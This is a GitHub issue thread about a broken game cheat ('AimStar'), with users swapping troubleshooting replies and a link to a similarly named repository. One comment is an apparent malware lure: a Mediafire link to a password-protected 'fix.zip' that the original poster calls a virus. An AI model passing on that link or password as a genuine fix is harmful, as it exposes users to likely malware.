### ISSUE TITLE
Cheat Dont work

### ISSUE THREAD

**Issue by 123yuyu123** [CowNowK/AimStar#372]
I have updated the offsets and installed driver but it dosnt work
![image](https://github.com/user-attachments/assets/d2ff6f05-0c2d-41bc-80f8-8a86b34b5361)

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 123yuyu123** [comment]
Can I have real answer ? Other than that afrikan guy who want me to download some virus

**Comment by MaYecha** [comment]
[click here](https://github.com/CowNowB/AimStar/)

**Comment by 123yuyu123** [comment]
it just redirect me to the github

**Comment by MaYecha** [comment]
If you are unable to access the new repository link I sent you, then try to fix it yourself
This is just a basic address naming issue where 'xxx.dll.cpp' has been changed to 'xxx-
_dll. cpp'

**Comment by 123yuyu123** [comment]
thank u so much i didnt see it was another github link

**Comment by ibrafdez** [comment]
> [click here](https://github.com/CowNowB/AimStar/)

I downloaded the file you posted, but I don't see the launcher anywhere to run it, can you help me?

**Comment by CowNowK** [comment]
> > [click here](https://github.com/CowNowB/AimStar/)
> 
> I downloaded the file you posted, but I don't see the launcher anywhere to run it, can you help me?

@ibrafdez 
1. 
![image](https://github.com/user-attachments/assets/c95c0b40-399c-40e7-9af9-4329a4cc9be6)

2. 
![image](https://github.com/user-attachments/assets/d941e2ae-b3ab-4f8b-92c0-db2576ced37d)

**Comment by ibrafdez** [comment]
I downloaded what you told me, and when I open it I get this.. ;(
![Sin título](https://github.com/user-attachments/assets/b9a53398-c964-45bc-b53f-3680ef4135f5)
